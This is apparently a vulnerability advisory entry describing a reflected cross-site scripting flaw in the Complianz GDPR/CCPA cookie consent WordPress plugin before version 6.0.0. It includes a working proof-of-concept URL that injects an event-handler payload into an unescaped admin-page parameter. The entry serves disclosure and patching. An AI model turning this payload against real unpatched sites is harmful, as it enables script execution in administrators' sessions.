WordPress Plugin Vulnerabilities
Complianz - GDPR/CCPA Cookie Consent < 6.0.0 - Reflected Cross-Site Scripting
Description
The plugin does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
Proof of Concept
https://example.com/wp-admin/admin.php?page=cmplz-proof-of-consent&s=%22+style%3Danimation-name%3Ashine+onanimationstart%3Dalert%281%29+x%3D
Affects Plugins
Fixed in version 6.0.0
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-17 (about 8 months ago)
Added
2022-01-17 (about 8 months ago)
Last Updated
2022-04-12 (about 5 months ago)